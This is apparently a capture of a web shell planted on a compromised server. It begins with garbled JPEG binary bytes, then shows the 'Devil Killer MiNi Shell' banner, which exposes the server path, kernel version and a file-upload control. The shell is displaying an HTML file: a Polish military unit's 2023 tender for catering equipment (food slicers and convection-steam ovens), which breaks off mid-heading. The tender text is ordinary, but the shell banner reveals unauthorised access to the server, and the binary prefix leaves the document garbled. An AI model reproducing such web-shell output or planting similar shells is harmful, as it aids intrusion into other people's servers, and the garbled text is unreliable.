JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230201/0007630501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa sprzętu gastronomicznego w 2023 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa sprzętu gastronomicznego w 2023 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-89396a47-a0a6-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00076305</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane <br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym <br/>z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na: „Zakup i dostawę sprzętu gastronomicznego w 2023 roku”, nr postępowania: 2/SZP/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa - AUTOMATYCZNA KRAJALNICA ŻYWNOŚCI - ELEKTRYCZNA<br/>minimalna ilość zamówienia 3 szt; maksymalna ilość zamówienia 6 szt. Miejsce dostawy - Magazyn służby żywnościowej 82-300 Elbląg ul. Kwiatkowskiego 15.<br/>Przeznaczenie: <br/>Do krojenia sera, wędlin, mięsa i pieczywa przy przygotowywaniu posiłków <br/>w obiektach żywienia zbiorowego.<br/>Materiał konstrukcyjny: <br/>1.	Podstawa, stół przesuwny wykonane ze stali nierdzewnej lub podwyższonej jakości stopów oksydowanych aluminiowych.<br/>2.	Ostrze noża wykonane z utwardzanej stali chromowej nierdzewnej hartowanej o średnicy 280 – 370 mm.<br/>3.	Powierzchnie robocze wykonane z materiałów dopuszczonych do kontaktów <br/>z żywnością (stal nierdzewna o dużej gładkości). <br/>Wymagania techniczne i eksploatacyjne:<br/>1.	Zasilanie: prąd przemienny jednofazowy 230 V, 50 Hz.<br/>2.	Moc znamionowa napędu noża do 0,4 kW.<br/>3.	Moc znamionowa napędu stołu do 0,2 kW.<br/>4.	Automatyczny tryb krojenia,<br/>5.	Min. zakres regulacji grubości plastrów: 1 – 20 mm;<br/>6.	Minimalna wydajność – min. 30 plastrów na minutę.<br/>7.	Funkcja liczenia plastrów (elektroniczny licznik krojonych plastrów);<br/>8.	Funkcja programowania ilości plastrów (min. 900 plastrów);<br/>9.	Funkcja automatycznego wyłączania maszyny w przypadku braku materiału do cięcia lub po realizacji żądanej ilości plastrów.<br/>10.	Prędkość obrotowa noża min 250 obr/min.<br/>11.	Powierzchnia robocza stołu 350 x 250 mm (± 80 mm).<br/>12.	Części łatwe do montażu i bezpieczne w obsłudze.<br/>13.	Wyposażenie:<br/>a) osłona przezroczysta z tworzywa,<br/>b) ostrzarka noża zintegrowana z maszyną z wymiennymi kamieniami, <br/>c) teflonowane noża oraz jego osłony (pokrywy noża).<br/>Wymagania dodatkowe: w załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42215100-7 - Maszyny do krojenia żywności</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami (oddzielnie dla części zamówienia nr 1, 2, 3):<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant okresu gwarancji - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant okresu gwarancji”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/><br/>W kryterium „Przyjęty do realizacji wariant okresu gwarancji” oferta uzyska:<br/>•	0 pkt za WARIANT I – zaoferowanie 12 miesięcznej gwarancji na przedmiot zamówienia <br/>•	20 pkt za WARIANT II – zaoferowanie 24 miesięcznej gwarancji na przedmiot zamówienia<br/>•	30 pkt za WARIANT III – zaoferowanie 36 miesięcznej gwarancji na przedmiot zamówienia<br/>•	40 pkt za WARIANT IV – zaoferowanie 48 miesięcznej gwarancji na przedmiot zamówienia<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant udzielanej gwarancji i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 5 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>a)	Gwarancji na przedmiot umowy, liczony będzie: <br/>- od dnia dostawy do Zamawiającego – dla części zamówienia nr 1 <br/>- od dnia rozruchu technicznego i technologicznego u Zamawiającego – dla części zamówienia nr 2, 3.<br/>b) Minimalny wymagany termin gwarancji wynosi 12 miesięcy, natomiast maksymalny, punktowany termin gwarancji wynosi 48 miesięcy.<br/>c) W przypadku niewpisania przez Wykonawcę w formularzu ofertowym żadnego terminu gwarancji, Zamawiający uzna, że Wykonawca zaoferował termin 12-miesięczny i otrzyma 0 pkt.<br/>d) W przypadku wpisania terminu gwarancji krótszego niż 12 miesięcy, oferta Wykonawcy zostanie odrzucona, jako niezgodna z SWZ.<br/>e) W przypadku wpisania terminu gwarancji dłuższego niż 48 miesięcy, Zamawiający przyzna punkty jak dla terminu 48-miesięcznego, natomiast do umowy wpisze, jako obowiązujący termin gwarancji faktycznie zaoferowany przez Wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant okresu dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa - PIEC KONWEKCYJNO-PAROWY, 20-PÓŁKOWY <br/>Z WYPOSAŻENIEM minimalna ilość zamówienia 2 szt; maksymalna ilość zamówienia 4 szt. Miejsce dostawy: Kuchnia i stołówka 11-200 Bartoszyce ul. Wojska Polskiego 4<br/>Urządzenia podlegające zakupowi:<br/>Piec konwekcyjno-parowy 20-półkowy z wyposażeniem przeznaczony do prowadzenia obróbki termicznej potraw w zakresie:<br/>a)	gotowanie w parze w temperaturze min. 30 – 120 oC;<br/>b)	pieczenie w temperaturze do min. 250 oC;<br/>c)	kombinacja pary i gorącego powietrza w temperaturze do min. 250 oC;<br/>d)	podgrzewanie i regeneracja potraw;<br/>e)	pieczenie z sondą.<br/>Właściwości techniczne:<br/>a)	jednorazowy wsad 20 pojemników 1/1 GN;<br/>b)	moc całkowita 30 – 40 kW;<br/>c)	zasilanie: 3N~/380-415V/50-60 Hz;<br/>Wymagania technologiczne pracy:<br/>1.	Wprowadzanie do pamięci min. 99 programów po min. 5 kroków każdy.<br/>2.	Wyposażony w funkcję: regulacji temperatury do min. 250 ºC i wilgotności 99%, funkcję ustawiania czasu pracy do min 8 godzin w trybie ręcznym i automatycznym (automatyczne wyłączenie po upłynięciu zaprogramowanego czasu pracy).<br/>3.	Wyłącznik czasowy z sygnałem dźwiękowym.<br/>4.	Elektroniczna diagnoza usterek – system serwisowo diagnostyczny umożliwiający wyświetlanie błędów na wyświetlaczu.<br/>5.	Program automatycznego mycia i czyszczenia komory pieca uzależniony od stopnia zabrudzenia pieca. <br/>6.	Oświetlenie komory pieca wykonane w technologii LED.<br/>7.	Cyfrowy wyświetlacz parametrów pracy min. czas, temperatura (możliwość wyświetlania w ºC), numer programu.<br/>8.	Menu w języku polskim.<br/>9.	Minimum 8 kategorii automatycznych programów przyrządzania potraw.<br/>10.	Możliwość podłączenia USB, wgrania i zgrania oprogramowania.<br/>11.	Podwójna lub potrójna szyba drzwi.<br/>12.	Dwufunkcyjny prysznic myjący komorę pieca.<br/>13.	Wielopunktowa sonda temperatury rdzenia pieczeni.<br/>14.	Konstrukcja pieca powinna gwarantować bezpieczną obsługę dla personelu, szczególnie pod względem zabezpieczenia przed poparzeniem się gorącą parą powstającą w procesach technologicznych przygotowywania potraw.<br/>15.	Kable zasilające i przyłączeniowe oraz przewody doprowadzające wodę o długości pozwalającej na bezpieczną eksploatację, ustalane indywidualnie w miejscu montażu.<br/>16.	Łącze do podłączenia komputera.<br/>Wyposażenie dodatkowe:<br/>1.	Pojemniki GN z uchwytami chowanym lub bez uchwytów :<br/>a)	1/1 GN 020 - 6 szt. (grubość min. 0,70 mm);<br/>b)	1/1 GN 040 - 3 szt. (grubość min. 0,65 mm);<br/>c)	1/1 GN 065 - 3 szt. (grubość min. 0,65 mm);<br/>d)	1/1 GN 100 - 3 szt. (grubość min. 0,65 mm);<br/>e)	1/1 GN 065 perforowany - 3 szt.;<br/>f)	1/1 GN 100 perforowany - 3 szt. z uchwytami chowanymi; <br/>2.	Stelaż – wózek ruchomy poj. min. 20x1/1GN.<br/>Wyposażenie dodatkowe pozostałe:<br/>1.	Zmiękczacz wody:<br/>a)	średni przepływ wody – min 15 l/min.;<br/>b)	ilość żywicy – min. 4,0 kg.;<br/>c)	skuteczność usuwania twardości wody – min. 15 stopni niemieckich;<br/>d)	ilość wody zużywanej do regeneracji – max. 10 % wody uzdatnionej;<br/>e)	tryb pracy – bezobsługowy, samoregenerujący w sposób ciągły;<br/>f)	zasilanie zmiękczacza prądem przemiennym jednofazowym 230 V, 50 Hz.<br/>2.	Filtr mechaniczny:<br/>a)	materiał wkładu – włókna polipropylenowe lub równorzędne;<br/>b)	skuteczność filtracji – pierwsza warstwa min. 75 µm;<br/>c)	druga warstwa min. 25 µm.;<br/>d)	przepływ przez filtr min. 25 l/min.;<br/>e)	zakres czyszczenia – redukcja zawiesiny i mętności wody, usuwanie związków: żelaza, manganu, zanieczyszczeń mechanicznych.<br/>3.	Tabletki myjące – 2 opakowania.<br/>4.	Tabletki spłukujące rozpuszczające wapń – 2 opakowania.<br/>Wymagania dodatkowe w załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42214100-0 - Piece kuchenne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami (oddzielnie dla części zamówienia nr 1, 2, 3):<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant okresu gwarancji - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant okresu gwarancji”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/><br/>W kryterium „Przyjęty do realizacji wariant okresu gwarancji” oferta uzyska:<br/>•	0 pkt za WARIANT I – zaoferowanie 12 miesięcznej gwarancji na przedmiot zamówienia <br/>•	20 pkt za WARIANT II – zaoferowanie 24 miesięcznej gwarancji na przedmiot zamówienia<br/>•	30 pkt za WARIANT III – zaoferowanie 36 miesięcznej gwarancji na przedmiot zamówienia<br/>•	40 pkt za WARIANT IV – zaoferowanie 48 miesięcznej gwarancji na przedmiot zamówienia<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant udzielanej gwarancji i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 5 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>a)	Gwarancji na przedmiot umowy, liczony będzie: <br/>- od dnia dostawy do Zamawiającego – dla części zamówienia nr 1 <br/>- od dnia rozruchu technicznego i technologicznego u Zamawiającego – dla części zamówienia nr 2, 3.<br/>b) Minimalny wymagany termin gwarancji wynosi 12 miesięcy, natomiast maksymalny, punktowany termin gwarancji wynosi 48 miesięcy.<br/>c) W przypadku niewpisania przez Wykonawcę w formularzu ofertowym żadnego terminu gwarancji, Zamawiający uzna, że Wykonawca zaoferował termin 12-miesięczny i otrzyma 0 pkt.<br/>d) W przypadku wpisania terminu gwarancji krótszego niż 12 miesięcy, oferta Wykonawcy zostanie odrzucona, jako niezgodna z SWZ.<br/>e) W przypadku wpisania terminu gwarancji dłuższego niż 48 miesięcy, Zamawiający przyzna punkty jak dla terminu 48-miesięcznego, natomiast do umowy wpisze, jako obowiązujący termin gwarancji faktycznie zaoferowany przez Wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania 